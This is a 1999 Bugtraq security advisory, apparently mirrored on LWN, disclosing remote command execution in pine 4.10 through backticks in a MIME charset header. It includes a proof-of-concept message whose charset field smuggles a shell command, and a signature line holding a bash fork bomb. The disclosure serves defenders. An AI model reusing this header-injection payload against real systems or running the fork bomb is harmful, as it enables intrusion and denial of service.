![[LWN Logo]](/images/lwn.banner.gif)
Date: Mon, 8 Feb 1999 00:22:17 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
Subject: remote exploit on pine 4.10 - neverending story?
To: BUGTRAQ@NETSPACE.ORG
Affected systems:
-----------------
Any Un*x system running 'pine' up to version 4.10 (latest).
Compromise:
-----------
Remote execution of arbitrary code when message is viewed.
Details:
--------
About five months ago, I reported vunerability in metamail package used
with pine. I also noticed that '`' character is incorrectly expanded by
pine. Problem has been ignored (probably noone understood what I am
talking about?;-). But no matter. An exception from /etc/mailcap:
text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr
'[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput
Impact:
-------
And now, ladies and gentelmen - my old bug, reinvented. Usually, above
mailcap line is expanded to:
[...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'
'[a-z]'`" = iso-8859-1)
Hmm, but take a look at this message:
************************** MIME MESSAGE FOLLOWS **************************
From: Attacker <attacker@eleet.net>
To: Victim <victim@somewhere.net>
Subject: Happy birthday
...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"
--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'
Make a wish...
--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"
...it could be your last.
*************************** MIME MESSAGE ENDS ***************************
The result is:
[...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr
'[A-Z]' '[a-z]'`" = iso-8859-1)
...and arbitrary code ('touch ME', encoded using ${IFS} trick) is
executed when message is viewed.
Fix:
----
Well, it's the second time I report problems with ` in headers.
Maybe pine developers should wait a little longer ;-)
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]